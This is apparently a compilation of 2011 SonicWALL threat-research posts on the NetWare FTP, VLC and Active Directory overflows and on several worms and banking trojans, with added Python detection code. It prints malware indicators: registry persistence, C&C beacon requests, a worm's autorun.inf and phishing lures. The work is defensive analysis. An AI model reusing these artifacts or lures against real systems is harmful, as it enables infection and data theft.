Novell Netware FTP Server Buffer Overflow (Mar 25, 2011)

Novell Netware is a network operating system developed by Novell. One of the services provided by Novell Netware is the Netware FTP Server, which provides file transfer to and from Netware volumes.

FTP is built on a client-server architecture and utilizes separate control and data connections between the client and server. Several FTP commands are available to perform different operations. The DEL/DELE command performs file deletion on the FTP server.

The syntax for the DEL/DELE command is as follows:

DEL
or
DELE

A stack buffer overflow vulnerability exists in Novell Netware FTP Server. The vulnerability is due to insufficient boundary checks when processing the DEL/DELE command. Remote authenticated attackers could exploit this vulnerability by connecting to a vulnerable Netware FTP Server and sending a malicious DEL/DELE command to the target server. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the FTP service. Code injection that does not result in execution would terminate the FTP session.

The vulnerability has been assigned CVE-2010-4228.
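As an added illustration of what a detection for this issue keys on (example code written for this page, not SonicWALL's signature logic): a Python check that scans the client side of an FTP control session and flags DEL/DELE commands whose argument exceeds a length threshold. The threshold, the sample session and the oversized argument are constructed assumptions; a real deployment would tune the limit to the longest legitimate path on the volume.

```python
import re

# Constructed FTP control-channel command lines (client side), not traffic from
# the advisory. The last line carries an oversized DEL argument as a stand-in
# for a malformed request.
SAMPLE_CLIENT_LINES = [
    "USER alice\r\n",
    "PASS s3cret\r\n",
    "CWD /SYS/PUBLIC\r\n",
    "DELE old_report.txt\r\n",
    "DEL " + "A" * 600 + "\r\n",
]

# Assumed alert threshold (not a value from the advisory): a legitimate
# NetWare path is far shorter than this, so anything longer is worth an alert.
MAX_DELE_ARG_LEN = 256

# DEL and DELE are the only verbs matched; DELETE or DELEX do not match.
_DELE_RE = re.compile(r"^(DELE?)\s+(.*)$", re.IGNORECASE | re.DOTALL)


def check_delete_command(line, max_len=MAX_DELE_ARG_LEN):
    """Classify one FTP command line.

    Returns (is_delete, arg_len, suspicious): is_delete is True for DEL/DELE,
    arg_len is the length of the argument, suspicious is True when the
    argument exceeds max_len.
    """
    m = _DELE_RE.match(line.rstrip("\r\n"))
    if not m:
        return (False, 0, False)
    arg = m.group(2)
    return (True, len(arg), len(arg) > max_len)


def find_suspicious_deletes(lines, max_len=MAX_DELE_ARG_LEN):
    """Return (line_number, verb, arg_len) for every overlong DEL/DELE in a session."""
    hits = []
    for n, line in enumerate(lines, start=1):
        is_delete, arg_len, suspicious = check_delete_command(line, max_len)
        if is_delete and suspicious:
            hits.append((n, line.split()[0].upper(), arg_len))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_deletes(SAMPLE_CLIENT_LINES):
        print("line %d: %s with %d-byte argument" % hit)
```

The check is deliberately verb-specific: a generic "long FTP argument" rule would also fire on legitimate long STOR paths, while the advisory ties the defect to DEL/DELE only.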

SonicWALL has released several IPS signatures to detect and block exploits targeting this vulnerability. The signatures are listed below:

  • 238 – DELE Command BO Attempt

  • 5541 – Generic FTP Shellcode Exploit 1
  • 2099 – Generic FTP Shellcode Exploit 2
  • 4961 – Generic FTP Shellcode Exploit 3
  • 4982 – Generic FTP Shellcode Exploit 4
  • 6367 – Generic FTP Shellcode Exploit 5

Momibot Worm – Spreading in the Wild (March 18, 2011)

SonicWALL UTM Research team received reports of a new variant of Momibot worm propagating in the wild. This worm propagates through emails, network and removable drives.

Process of Infection:

An unsuspecting user may receive an email with the malware attachment.

From: {user}
Subject: nake pics as you’ve requested
Attachment: picofme.zip (59.3KB)


Installation:

Once the user opens and executes the attachment, it will do the following:

Drops a copy of itself:

  • %System%\{random filename in %System%}{random letter}.exe – [ detected as GAV: Momibot.B_4 (Trojan) ]
  • %System%\{random filename}.dat – [ Data File ]

Registry Changes

Adds the following AutoStart registry entries to ensure that the malware runs on every system startup.

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    Value: Win32Update
    Data: “C:\WINDOWS\System32\{random filename in %System%}{random letter}.exe”
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
    Value: Win32Update
    Data: “C:\WINDOWS\System32\{random filename in %System%}{random letter}.exe”
  • HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
    Value: Win32Update
    Data: “C:\WINDOWS\System32\{random filename in %System%}{random letter}.exe”
  • HKEY_LOCAL_MACHINE\System\CurrentControlset\Control\Lsa
    Value: Win32Update
    Data: “C:\WINDOWS\System32\{random filename in %System%}{random letter}.exe”

Adds the following registry entries to install the malware as a service. The service name is derived by concatenating the names of two services already installed on the system.

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermServiceRSVP
    Value: ImagePath
    Data: “C:\WINDOWS\System32\{random filename in %System%}{random letter}.exe”

Mutex

Creates this mutex to ensure only a single instance is running in memory.

  • 9LZZ1TXjZ5NHrnf71f

Command & Control (C&C) Server connection:

Upon successful installation, it tries to connect to a remote server to receive further instruction:

  • http://9{REMOVED}5.174

This worm will also join the following IRC Channel to receive instruction:

  • Port: 6667
  • IRC Channel: #AllNiteCafe

Backdoor Functionality:

  • Update itself
  • Remove itself
  • Download and execute files
  • Gather system information

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: Momibot.B_4 (Trojan)

Adobe Flash Player 0-Day Exploit (Mar 17, 2011)

SonicWALL UTM Research team found reports of a new 0-day vulnerability in Adobe Flash Player 10 and in the “authplay.dll” file that ships with Adobe Reader and Acrobat X products.

An attacker can exploit this vulnerability by enticing a user to open a crafted Excel spreadsheet (.xls), which contains a malicious Flash (.swf) file. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged in user. Code injection that does not result in execution would terminate the application due to memory corruption.

The vulnerability has been assigned CVE-2011-0609.

SonicWALL has released an IPS signature to detect and block known exploits targeting this vulnerability. The following signature was released to address this issue:

  • 6349 – Adobe Flash Player Code Execution Attempt

Tedroo Spam Trojan (Mar 11, 2011)

SonicWALL UTM Research discovered a newer variant of Tedroo trojan spreading in the wild. This variant of the Tedroo trojan was in turn found to be spamming the newer variant of Spyeye trojan. When the Tedroo trojan is downloaded and executed it performs the following activities:

  • It creates the following files:
    • %temp%\DATF2.tmp.exe (Copy of Itself) [Detected as GAV: Tedroo.AQ (Trojan)]
    • %windir%\system32\drivers\str.sys (encrypted data file)

  • It creates the following registry entry to ensure that the dropped malware runs as a service on every system reboot:
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\hxwclmobypwlr: “%temp%\DATF2.tmp.exe”
  • It makes the following HTTP requests to a remote IP address:
    • POST /548/getcfg.php – This request returns a configuration file which is encrypted
    • GET /spm/s_get_host.php?ver=548 – This request returns the public IP address of the infected host
    • GET /spm/s_alive.php?id={removed}&tick=1691546&ver=548&smtp=ok&sl=1&fw=0&pn=0&psr=0
      It reports back information regarding the infected machine with various parameters. Some of the parameters used are:
      • id: random id for infected machine
      • tick: system uptime in milliseconds
      • ver: version of Tedroo
      • smtp: Returns “ok” if SMTP servers are reachable after checking connectivity to the mail servers of Mail, Hotmail, Yahoo, Google and AOL
      • fw: returns firewall status
    • GET /spm/s_task.php?id={removed}&tid=38666 – This request returns a list of email addresses, email content to spam and other information

  • It spams the new Spyeye trojan. The email is crafted to appear like it originates from DHL:

    screenshot

  • The attachment in the email is a zip file which contains the following file:
    • doc.exe [Detected as GAV: Spyeye.Y (Trojan)]
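As an added example, not SonicWALL's detection code: Python that classifies the beacon requests listed above from proxy log lines and pulls out the parameters the keepalive reports. The log line format, the client addresses and the documentation IP 203.0.113.10 are constructed; the paths and parameter names are the ones given in the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines ("client method url"), modelled on the request
# paths listed above; 203.0.113.10 is a documentation address, not the real C&C.
SAMPLE_LOG = [
    "10.0.0.5 GET http://203.0.113.10/spm/s_get_host.php?ver=548",
    "10.0.0.5 GET http://203.0.113.10/spm/s_alive.php?id=REDACTED&tick=1691546&ver=548&smtp=ok&sl=1&fw=0&pn=0&psr=0",
    "10.0.0.5 GET http://203.0.113.10/spm/s_task.php?id=REDACTED&tid=38666",
    "10.0.0.5 POST http://203.0.113.10/548/getcfg.php",
    "10.0.0.7 GET http://www.example.com/index.html",
]

# Beacon stages keyed by exact path; getcfg.php sits under a version directory.
STAGE_BY_PATH = {
    "/spm/s_get_host.php": "ip-lookup",
    "/spm/s_alive.php": "keepalive",
    "/spm/s_task.php": "spam-task",
}
GETCFG_RE = re.compile(r"^/(?P<ver>\d+)/getcfg\.php$")


def classify_request(method, url):
    """Return {"stage", "version", "params"} for a Tedroo-style beacon, else None."""
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    m = GETCFG_RE.match(parts.path)
    if m and method.upper() == "POST":
        return {"stage": "config-download", "version": m.group("ver"), "params": params}
    stage = STAGE_BY_PATH.get(parts.path)
    if stage is None:
        return None
    return {"stage": stage, "version": params.get("ver"), "params": params}


def scan_log(lines):
    """Return (client, finding) for each log line that matches a beacon stage."""
    findings = []
    for line in lines:
        try:
            client, method, url = line.split(None, 2)
        except ValueError:
            continue  # malformed log line; skip it
        finding = classify_request(method, url)
        if finding is not None:
            findings.append((client, finding))
    return findings


def infected_clients(lines):
    """Distinct client addresses that issued at least one beacon request."""
    return sorted({client for client, _ in scan_log(lines)})


def keepalive_summary(finding):
    """Pull out the fields the keepalive reports: uptime tick, SMTP check, firewall state."""
    p = finding["params"]
    return {"tick": p.get("tick"), "smtp": p.get("smtp"), "fw": p.get("fw"), "ver": p.get("ver")}


if __name__ == "__main__":
    for client, finding in scan_log(SAMPLE_LOG):
        print(client, finding["stage"], finding["version"])
```

Matching on the path alone is what makes this robust to the C&C host changing between variants; the `ver` value and the numeric directory in the getcfg.php path give the variant version without any decryption of the configuration.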

SonicWALL Gateway AntiVirus provides protection against these threats via the following signatures:

GAV: Tedroo.AQ (Trojan)
GAV: Spyeye.Y (Trojan)


New banking Trojan – Tatanga (Mar 4, 2011)

SonicWALL UTM Research team received reports of a new banking Trojan named Tatanga in the wild. Spain, Germany, the United States and the United Kingdom are the top countries affected by this Trojan.

This Trojan has many sophisticated features resembling functions found in the popular crimeware toolkits Zeus and SpyEye, including:

  • Encrypted configuration files.
  • Encrypted communication between the bot and the Command & Control server.
  • Dynamic HTML injection affecting users of popular browsers like IE, Firefox, Chrome, Safari etc.
  • Disables AV applications.
  • Harvests e-mail addresses & other sensitive information.
  • Removes other malware infections, specifically Zeus.

Upon infection, the Trojan performs following activities on the victim machine:

  • Injects itself into the explorer.exe process and conceals its presence on the system. Logs information related to banking sessions, including credentials, and uploads it to a remote server.
  • Drops the following files:
    • %User Application Data%\Microsoft\Internet Explorer\report.exe <- Copy of itself [ Detected as: GAV: Tatanga.gen (Trojan) ]
    • %User Local Settings%\Temp\report.dll <- [ Detected as: GAV: Pincav.BAHA (Trojan) ]
    • %User Application Data%\Help\a.dll
    • %User Application Data%\Help\d.dll
    • %User Application Data%\Help\n.dll
    • %User Application Data%\Help\p.dll
    • DLL files dropped in the Help directory are encrypted data files.

  • Attempts to communicate with C&C server via a predetermined list of compromised web sites.

  • Disables the host Antivirus application.
  • Adds following registry entry to bypass firewall restrictions:
    • Key: [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] Value: “c:\windows\explorer.exe”
      Data: “c:\windows\explorer.exe:*:Enabled:explorer”

Screenshots showing some statistics from control panel used by this banking Trojan:


SonicWALL Gateway AntiVirus provides protection against this Trojan via the following signature:

  • GAV: Tatanga.gen (Trojan)

VideoLAN VLC Media Player Subtitle Heap BO (Mar 03, 2011)

VideoLAN is a project that develops software for playing video and other media formats across a local area network (LAN). It originally developed two programs for media streaming, VideoLAN Client (VLC) and VideoLAN Server (VLS), but most of the features of VLS have been incorporated into VLC, with the result renamed VLC media player. VLC media player is a free and open source media player and multimedia framework.

VLC media player can play many audio and video formats (MPEG, DivX, ogg, Wave etc.) as well as various streaming protocols. The Matroska Multimedia Container, an open standard, free container format, is one that can be played by VLC media player. The Matroska can hold an unlimited number of video, audio, picture or subtitle tracks inside a single file. It is intended to serve as a universal format for storing common multimedia content, like movies or TV shows. Matroska is similar in concept to other containers like AVI, MP4 or ASF, but is entirely open in specification, with many implementations in open source software. Matroska file types are .MKV for video (with subtitles and audio), .MKA for audio-only files and .MKS for subtitles only.

The Matroska file format is based on Extensible Binary Meta Language (EBML), a generalized file format similar to XML. The Matroska files only have two different top level elements, EBML and Segment. The Segment is the top level container for multimedia data. The Tracks element contains information about the tracks that are stored in the Segment, such as track type (audio, video, subtitles), the codec used, resolution and sample rate.

A heap buffer overflow vulnerability exists in VLC Media player. When handling subtitles, the application can overflow a heap buffer through lack of bounds checking in the StripTags() function while processing strings with an opening "<" without the terminating ">". A remote attacker could exploit this vulnerability to overflow the heap buffer and inject arbitrary code. The injected code would run under the security context of the logged-in user.
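The edge case named above is a "<" with no closing ">". As an added example (not VLC's StripTags() code), here is a Python tag stripper for subtitle text that handles that case with a search bounded to the input, plus a property check that the output can never be longer than the input, which is the invariant a fixed-size destination buffer relies on. The choice to drop everything after an unterminated "<" is an assumption; rendering it literally would be equally safe.

```python
import random


def strip_tags(text):
    """Remove <...> markup from a subtitle line without reading past its end.

    A '<' with no matching '>' is treated as the start of an unterminated tag:
    the scan stops there instead of searching beyond the end of the string.
    """
    out = []
    i, n = 0, len(text)
    while i < n:
        if text[i] == "<":
            close = text.find(">", i + 1)  # bounded search within the string
            if close < 0:
                break  # unterminated tag: nothing after '<' is rendered
            i = close + 1
            continue
        out.append(text[i])
        i += 1
    return "".join(out)


def check_length_invariant(trials=2000, seed=1):
    """Property check: the stripped output never exceeds the input length.

    Random strings over a small alphabet exercise nested, empty and
    unterminated tags; a destination buffer of len(input) + 1 is therefore
    always large enough for the result.
    """
    rng = random.Random(seed)
    alphabet = "ab<> "
    for _ in range(trials):
        s = "".join(rng.choice(alphabet) for _ in range(rng.randint(0, 12)))
        if len(strip_tags(s)) > len(s):
            return False
    return True


if __name__ == "__main__":
    print(repr(strip_tags("<i>Hello</i> <b>world</b>")))
    print(repr(strip_tags("Hello <i world")))
    print(check_length_invariant())
```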

The SonicWALL IPS team has researched the vulnerability and created the following IPS signatures to cover exploits related to it:

  • 6286 VideoLAN VLC Media Player Subtitle Heap BO Exploit 1
  • 6287 VideoLAN VLC Media Player Subtitle Heap BO Exploit 2

This vulnerability has been assigned CVE-2011-0522.

New Windows Live Messenger worm (Feb 25, 2011)

The SonicWALL UTM Research team received reports of a new variant of a Windows Live messenger Worm propagating in the wild. This Worm spreads by presenting various links to users on the MSN contact list of the compromised user. The Worm also downloads FakeAV software upon installation.

An unsuspecting user may receive a message over the MSN Messenger network containing a link to a malicious file:

Upon execution of the downloaded file, the FakeAV software will display the following pop-up:

It will perform a fake scan of the system:

Upon pressing “Yes” the Trojan will pop up a payment page in Internet Explorer for purchasing the FakeAV software:

The worm performs the following DNS queries:

  • www.startacademy.be
  • host5500.net

It downloads www.{removed}/bb.exe [Detected as GAV: Buzus.HAPC (Trojan)] and renames the file to 4417934.exe

The following files are dropped on the compromised system:

  • C:\Documents and Settings\{USER}\Application Data\msnsvconfig.txt
  • C:\Documents and Settings\{USER}\Local Settings\Temp\4417934.exe [Detected as GAV: Buzus.HAPC (Trojan)]
  • C:\Documents and Settings\{USER}\Microsoft-Driver-1-52-2475-9627-8645\winrsvn.exe [Detected as GAV: Buzus.HAPC (Trojan)]

Registry modification:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft(R) Service Update “C:\Documents and Settings\{USER}\Microsoft-Driver-1-52-2475-9627-8645\winrsvn.exe”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Documents and Settings\{USER}\Microsoft-Driver-1-52-2475-9627-8645\winrsvn.exe “C:\Documents and Settings\{USER}\Microsoft-Driver-1-52-2475-9627-8645\winrsvn.exe:*:Enabled:Microsoft(R) Service Update”

SonicWALL Gateway AntiVirus provides protection against this malware via following signatures:

  • GAV: Buzus.HAPC (Trojan)
  • GAV: IRCBot.DTO_2 (Trojan)

MS Windows Active Directory BO (Feb 18, 2011)

Microsoft Windows Active Directory is a directory service running on Windows domain controllers. Active Directory utilizes the Computer Browser service technology to collect, distribute, and obtain information about workgroups, domains, and individual hosts on a network.

The Computer Browser service typically uses connectionless server broadcasts to communicate between nodes. Registration, announcements, and browser elections are performed by the service to provide the network with a list of available resources. Individual nodes on a browser system play various browser roles. There are five browse service roles that computers can play in the browser system:

  • Non-Browser
  • Potential Browser
  • Backup Browse Server
  • Master Browse Server
  • Domain Master Browser

All Windows Server 2003 domain controllers are configured as either master browse servers or backup browse servers. A server broadcasts a Host Announcement message on startup to announce its presence to the master browse server. The process of adding a new server entry to the master browse server’s browse list is called registration. In the case where there is no WINS server, all name registrations as well as name lookups are done by UDP broadcast. Where a WINS server is used, the Windows client will use UDP unicast to register with the WINS server. This name is registered by the master browse server and is used to broadcast and receive domain announcements on the local subnet. A Browser Election takes place to select a new master browse server under the following circumstances:

  • A host cannot locate a master browse server
  • A preferred master browse server comes online
  • A Windows-based domain controller starts
  • A backup browse server cannot contact the master browse server

A computer initiates an election by broadcasting a Browser Election Request. The Browser Election Request is transmitted over SMB. This request has the following format:

    Offset  Size  Description
    ------  ----  -----------------------------------
    0x0000  1     Command
    0x0001  1     Election Version
    0x0002  4     Election Criteria
    0x0006  4     Client uptime
    0x000A  4     Unused
    0x000E  N     Null-terminated ASCII server name

If a browser receives this request with a lower ranking of election criteria than its own, then the browser sends its own Browser Election Request. If the browser does not have a higher ranking value then the browser attempts to determine which computer is the new master browse server.

A heap overflow vulnerability exists in Microsoft Windows Server 2003 when configured as an Active Directory server. The vulnerability is due to a boundary error in the kernel component of the Windows Browsing service that is responsible for handling incoming Browser Election Requests. The vulnerable code fails to properly handle overly long ServerName field values. When an overly long ServerName field is encountered, the code allocates a fixed-size buffer to store multiple fields, starting with the ServerName field. A ServerName field that is longer than the allowable size causes the calculated size of the remainder of the buffer to be zero. Later in the process flow, this zero size is decreased by one, causing an integer underflow. The code performs additional calculations on the value and then uses the final value as the size for a double-word copy operation into the aforementioned buffer. The copy operation overruns the buffer and corrupts memory. This condition can potentially lead to overwritten function pointers and code injection and execution. Successful exploitation may lead to kernel-level code injection and execution. Unsuccessful code execution attempts may cause the target system to crash, leading to a system-wide denial of service condition.
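To make the field layout above concrete, here is an added Python example (not SonicWALL's or Microsoft's code) that parses a Browser Election Request payload and rejects frames with an overlong or unterminated ServerName before anything is copied, which is the check the vulnerable code lacks. Assumptions not on the page: 0x08 as the election request command value, 15 characters as the NetBIOS computer-name limit used for the acceptable length, and all sample frames are constructed.

```python
import struct

# Field layout from the request format above: one-byte Command, one-byte
# Election Version, then three little-endian 32-bit fields (Election Criteria,
# Client uptime, Unused). The server name follows at offset 0x000E.
HEADER_FMT = "<BBIII"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 14 == 0x000E

# Assumptions not stated on the page: 0x08 is the MS-BRWS opcode for an
# Election Request, and 15 characters is the NetBIOS computer-name limit used
# here as the acceptable server-name length.
ELECTION_REQUEST_CMD = 0x08
MAX_SERVER_NAME = 15


class MalformedElectionRequest(ValueError):
    """Raised for frames that a hardened receiver should drop before copying."""


def parse_election_request(frame, max_name=MAX_SERVER_NAME):
    """Parse a Browser Election Request, validating the name length up front."""
    if len(frame) < HEADER_LEN:
        raise MalformedElectionRequest("frame shorter than the fixed header")
    cmd, version, criteria, uptime, _unused = struct.unpack_from(HEADER_FMT, frame, 0)
    if cmd != ELECTION_REQUEST_CMD:
        raise MalformedElectionRequest("command 0x%02x is not an election request" % cmd)
    tail = frame[HEADER_LEN:]
    end = tail.find(b"\x00")
    if end < 0:
        raise MalformedElectionRequest("server name is not null-terminated")
    name = tail[:end]
    # The length check happens before any copy, so an overlong name can never
    # drive the remaining-buffer size to zero (the underflow described above).
    if len(name) > max_name:
        raise MalformedElectionRequest("server name is %d bytes, limit %d" % (len(name), max_name))
    if not name.isascii():
        raise MalformedElectionRequest("server name is not ASCII")
    return {
        "version": version,
        "criteria": criteria,
        "uptime": uptime,
        "server_name": name.decode("ascii"),
    }


def is_safe_election_request(frame):
    """True when the frame passes every check; False when it should be dropped."""
    try:
        parse_election_request(frame)
        return True
    except MalformedElectionRequest:
        return False


def build_election_request(name, criteria=0x20010F01, uptime=60000, version=1):
    """Construct a test frame; the criteria and uptime defaults are arbitrary."""
    return struct.pack(HEADER_FMT, ELECTION_REQUEST_CMD, version, criteria, uptime, 0) + name + b"\x00"


# Constructed sample frames: one normal request and three malformed ones.
BENIGN_FRAME = build_election_request(b"WORKSTATION1")
OVERSIZED_FRAME = build_election_request(b"A" * 300)
UNTERMINATED_FRAME = build_election_request(b"NONULL")[:-1]
WRONG_CMD_FRAME = b"\x01" + BENIGN_FRAME[1:]

if __name__ == "__main__":
    print(parse_election_request(BENIGN_FRAME))
    for f in (OVERSIZED_FRAME, UNTERMINATED_FRAME, WRONG_CMD_FRAME):
        print(is_safe_election_request(f))
```

The same checks map directly onto a network signature: a Browser Election Request whose name field runs past a short fixed length, or has no terminator within the frame, is the pattern to alert on.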

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • 6253 – MS Windows Active Directory BROWSER ELECTION BO Attempt

In addition to this threat-specific signature, SonicWALL routinely releases generic signatures that detect frequently used byte patterns in exploitation attempts against vulnerabilities such as this one.

This vulnerability has been assigned CVE-2011-0654 by MITRE.

Buzus.GDEF – Mass-Mailing Worm (Feb 18, 2011)

SonicWALL UTM Research team received reports of a new variant of a mass-mailing worm propagating in the wild. This worm propagates through emails, P2P applications, network shares and removable drives.

Process of Infection:

An unsuspecting user may receive an email with the malware attachment. This worm can send emails as follows:

From: invitations@twitter.com
Subject: Your friend invited you to Twitter!
Attachment: Invitation Card.zip


From: order-update@amazon.com
Subject: Shipping update for your Amazon.com order
Attachment: Shipping documents .zip


From: update@facebookmail.com
Subject: You have got a new message on Facebook!
Attachment: Facebook message.zip


From: e-cards@hallmark.com
Subject: You have received A Hallmark E-Card!
Attachment: Postcard.zip


From: invitations@hi5.com
Subject: Laura would like to be your friend on hi5!
Attachment: Invitation Card.zip


From: resume-thanks@google.com
Subject: Thank you from Google!
Attachment: CV-20100120-112.zip


It may also send a phishing email:


Installation:

Once the user opens and executes the attachment, it will do the following:

Drops a copy of itself:

  • WINDOWS\system32\PCSuite.exe – [ detected as GAV: Buzus.GDEF (Trojan) ]
  • WINDOWS\system32\sta-css.exe – [ detected as GAV: (Cloud) Mufanom.APSW (Trojan) ]
  • WINDOWS\{random}.dll – [ detected as GAV: (Cloud) Mufanom.APSW (Trojan) ]
  • WINDOWS\system32\stat-cpe.exe – [ detected as GAV: Twain.A (Trojan) ]

Registry Changes

Adds the following registry entries to ensure that the malware runs on every system startup.

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    Value: Nokia Launch Application
    Data: “C:\WINDOWS\System32\PCSuite.exe”
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    Value: Yravasaxog
    Data: “WINDOWS\w3dyu1.dll”,Startup

Adds the following registry entries as part of its installation:

  • Key: HKEY_CURRENT_USER\Software\Nokia4
  • Key: HKEY_LOCAL_MACHINE\Software\Nokia4
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer nok01 “11”
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer nok01 “24”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system EnableLUA dword:00000000
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UACDisableNotify InNewValue dword:00000001

Adds following registry entry to bypass firewall restrictions:

  • Key: [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] Value: “C:\WINDOWS\system32\PCSuite.exe”
    Data: “C:\WINDOWS\system32\PCSuite.exe:*:Enabled:Explorer”

Mutex

Creates this mutex to ensure only a single instance is running in the memory.

  • PCSuite.exeDm28sf0V@XK$NX8hOu

Propagation

Removable Drives

Drops an Autorun.inf and a copy of itself named redmond.exe on removable drives:

    [autorun]
    open=RECYCLER\S-1-6-21-2434476521-1645641927-702000330-1542\redmond.exe
    icon=%SystemRoot%\system32\SHELL32.dll,4
    action=Open folder to view files
    shell\open=Open
    shell\open\command=RECYCLER\S-1-6-21-2434476521-1645641927-702000330-1542\redmond.exe
    shell\open\default=1
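An added Python example (not SonicWALL's code) that parses an autorun.inf and scores the folder-impersonation traits shown above: an executable launched from a Recycle Bin SID directory, the "Open folder to view files" prompt text, a SHELL32.dll icon, and shell\open\default=1 making the rogue verb the default action. Both sample files are constructed, the first modelled on the worm's, and the two-trait threshold is an assumption.

```python
import configparser
import re

# Constructed autorun.inf modelled on the one above (same structure, same
# fake SID directory), embedded here as test input.
SAMPLE_AUTORUN = r"""[autorun]
open=RECYCLER\S-1-6-21-2434476521-1645641927-702000330-1542\redmond.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=RECYCLER\S-1-6-21-2434476521-1645641927-702000330-1542\redmond.exe
shell\open\default=1
"""

# Constructed benign autorun.inf, as shipped on a vendor install disc.
BENIGN_AUTORUN = r"""[autorun]
open=setup.exe
icon=setup.exe
label=Vendor Install Disc
"""

EXE_RE = re.compile(r"\.exe\b", re.IGNORECASE)
# A path under RECYCLER\S-1-... (the worm's hiding place); the SID need not be valid.
SID_DIR_RE = re.compile(r"recycle[rd]?\\s-1-\d+(?:-\d+)+", re.IGNORECASE)
WINDOWS_PROMPT = "open folder to view files"
LAUNCH_KEYS = ("open", r"shell\open\command", "shellexecute")


def parse_autorun(text):
    """Return the [autorun] section as a dict of lower-cased keys, or {} if absent."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("autorun"):
        return {}
    return dict(cp.items("autorun"))


def assess_autorun(text):
    """List the traits of this autorun.inf that match the worm's technique."""
    entries = parse_autorun(text)
    findings = []
    launchers = [k for k in LAUNCH_KEYS if k in entries]
    for key in launchers:
        if EXE_RE.search(entries[key]):
            findings.append("%s launches an executable: %s" % (key, entries[key]))
    if any(SID_DIR_RE.search(entries[k]) for k in launchers):
        findings.append("launch target is hidden under a Recycle Bin SID directory")
    if entries.get("action", "").strip().lower() == WINDOWS_PROMPT:
        findings.append("action text mimics the Windows 'Open folder to view files' prompt")
    if "shell32.dll" in entries.get("icon", "").lower():
        findings.append("icon borrowed from SHELL32.dll so the drive looks like a plain folder")
    if entries.get(r"shell\open\default", "").strip() == "1":
        findings.append(r"shell\open\default=1 makes the rogue verb the double-click action")
    return findings


def is_suspicious_autorun(text, threshold=2):
    """Two or more folder-impersonation traits are treated as a worm-style autorun."""
    return len(assess_autorun(text)) >= threshold


if __name__ == "__main__":
    for finding in assess_autorun(SAMPLE_AUTORUN):
        print("-", finding)
    print("benign suspicious:", is_suspicious_autorun(BENIGN_AUTORUN))
```

Launching an executable on its own is what a legitimate install disc does too, which is why the score needs the impersonation traits before it fires; on a host where AutoRun is disabled for removable media the file is inert, but its presence still marks a drive that touched an infected machine.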

Peer-2-Peer Application

May copy itself into the following folders using the filenames listed below:

Folder:

  • C:\program files\icq\shared folder
  • C:\program files\grokster\my grokster
  • C:\program files\emule\incoming
  • C:\program files\morpheus\my shared folder
  • C:\program files\limewire\shared
  • C:\program files\tesla\files
  • C:\program files\winmx\shared
  • C:\Downloads

Filename:

  • Ad-aware 2010.exe
  • Adobe Acrobat Reader keygen.exe
  • Adobe Illustrator CS4 crack.exe
  • Adobe Photoshop CS5 crack.exe
  • Alcohol 120 v1.9.7.exe
  • Anti-Porn v13.5.12.29.exe
  • AnyDVD HD v.6.3.1.8 Beta incl crack.exe
  • Ashampoo Snap 3.02.exe
  • AVS Video Converter v6.3.1.365 CRACKED.exe
  • BitDefender AntiVirus 2010 Keygen.exe
  • Blaze DVD Player Pro v6.52.exe
  • CleanMyPC Registry Cleaner v6.02.exe
  • Daemon Tools Pro 4.50.exe
  • Divx Pro 7 + keymaker.exe
  • Download Accelerator Plus v9.exe
  • Download Boost 2.0.exe
  • DVD Tools Nero 10.5.6.0.exe
  • G-Force Platinum v3.7.5.exe
  • Google SketchUp 7.1 Pro.exe
  • Grand Theft Auto Episodes From Liberty City 2010.exe
  • Image Size Reducer Pro v1.0.1.exe
  • Internet Download Manager V5.exe
  • Kaspersky AntiVirus 2010 crack.exe
  • K-Lite Mega Codec v5.5.1.exe
  • K-Lite Mega Codec v5.6.1 Portable.exe
  • LimeWire Pro v4.18.3.exe
  • MagicISO Magic ISO Maker v5.5.0276 Cracked.exe
  • McAfee Total Protection 2010.exe
  • Microsoft.Windows 7 ULTIMATE FINAL activator+keygen x86.exe
  • Motorola
  • Mp3 Splitter and Joiner Pro v3.48.exe
  • ms09-067.exe
  • Myspace theme collection.exe
  • Nero 9 9.2.6.0 keygen.exe
  • Norton Anti-Virus 2010 crack.exe
  • Norton Internet Security 2010 crack.exe
  • PCSuite.exe
  • PDF password remover (works with all acrobat reader).exe
  • PDF to Word Converter 3.0.exe
  • PDF Unlocker v2.0.3.exe
  • PDF-XChange Pro.exe
  • Power ISO v4.2 + keygen axxo.exe
  • Rapidshare Auto Downloader 3.8.exe
  • RapidShare Killer AIO 2010.exe
  • Sony Vegas Pro v9.0a incl crack.exe
  • Sophos antivirus updater bypass.exe
  • Starcraft2 battle.net key generator.exe
  • Starcraft2 battle.net keys.txt.exe
  • Starcraft2.exe
  • Starcraft2 REGION-UNLOCKER.exe
  • Starcraft2 SERVER-CHANGER.exe
